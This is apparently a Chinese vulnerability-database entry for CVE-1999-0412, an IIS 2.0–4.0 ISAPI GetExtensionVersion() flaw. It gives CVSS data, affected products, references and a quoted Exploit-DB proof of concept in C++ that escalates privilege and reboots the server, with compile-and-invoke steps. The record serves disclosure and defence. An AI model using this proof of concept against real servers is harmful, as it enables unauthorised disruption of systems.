CVE-1999-0412
CVSS7.5
发布时间 :1999-02-19 00:00:00
修订时间 :2008-09-09 08:34:30
NMCOE    

[原文]In IIS and other web servers, an attacker can attack commands as SYSTEM if the server is running as SYSTEM and loading an ISAPI extension.


[CNNVD]NT IIS ISAPI GetExtensionVersion()漏洞(CNNVD-199902-043)

        IIS以及其他网络服务器存在漏洞。如果服务器正作为SYSTEM运行并且正在加载一个ISAPI分机,那么攻击者可以攻击如SYSTEM命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:internet_information_server:3.0Microsoft IIS 3.0
cpe:/a:microsoft:internet_information_server:2.0Microsoft IIS 2.0
cpe:/a:microsoft:internet_information_server:4.0Microsoft IIS 4.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0412
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0412
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199902-043
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/501
(UNKNOWN)  BID  501

- 漏洞信息

NT IIS ISAPI GetExtensionVersion()漏洞
高危 竞争条件
1999-02-19 00:00:00 2005-05-02 00:00:00
本地  
        IIS以及其他网络服务器存在漏洞。如果服务器正作为SYSTEM运行并且正在加载一个ISAPI分机,那么攻击者可以攻击如SYSTEM命令。

- 公告与补丁

        Do not allow users to use ISAPI extensions and their own CGI on the same server.

- 漏洞信息 (19376)

Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion() Vulnerability (EDBID:19376)
windows local
1999-03-08 Verified
0 Fabien Royer
N/A [点击下载]
source: http://www.securityfocus.com/bid/501/info


IIS and potentially other NT web servers have a vulnerability that could allow arbitrary code to be run as SYSTEM. This works because of the way the server calls the GetExtensionVersion() function the first time an ISAPI extension is loaded. Any user able to put a CGI script in the web structure can insert code that will be run as SYSTEM during this window.


Copied verbatim from a post to NTbugtraq by Fabien Royer <fabienr@BELLATLANTIC.NET>.

Using VC++, create an ISAPI extension project and call it CRbExtension. Replace GetExtensionVersion() and Default() with the code below. Compile it to something
simple, like rb.dll. Place it on your web server and invoke it from your browser like this http://your.machine.namerb.dll? Note: if you are using IE4.0, don't call this from
the machine that is running the web server otherwise, the next time you log in, IE will recall the last URL and you'll reboot again.

BOOL CRbExtension::GetExtensionVersion(HSE_VERSION_INFO* pVer)
{ HANDLE hToken; // handle to process token TOKEN_PRIVILEGES tkp; // pointer to token structure

// Get the current process token handle so we can get shutdown // privilege. OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY, &hToken);

// Get the LUID for shutdown privilege. LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid);

tkp.PrivilegeCount = 1; // one privilege to set tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

// Get shutdown privilege for this process. AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0);

ExitWindowsEx(EWX_REBOOT,0);

// Disable shutdown privilege. tkp.Privileges[0].Attributes = 0; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0);

// Call default implementation for initialization CHttpServer::GetExtensionVersion(pVer);

// Load description string TCHAR sz[HSE_MAX_EXT_DLL_NAME_LEN+1]; ISAPIVERIFY(::LoadString(AfxGetResourceHandle(),IDS_SERVER, sz,
HSE_MAX_EXT_DLL_NAME_LEN)); _tcscpy(pVer->lpszExtensionDesc, sz); return TRUE;
}

void CRbExtension::Default(CHttpServerContext* pCtxt)
{ StartContent(pCtxt); WriteTitle(pCtxt);

*pCtxt << _T("Reboot<br>");

EndContent(pCtxt);
} 		

- 漏洞信息

1020
Microsoft IIS ISAPI GetExtensionVersion() Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

1999-02-19 Unknow
1999-02-19 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站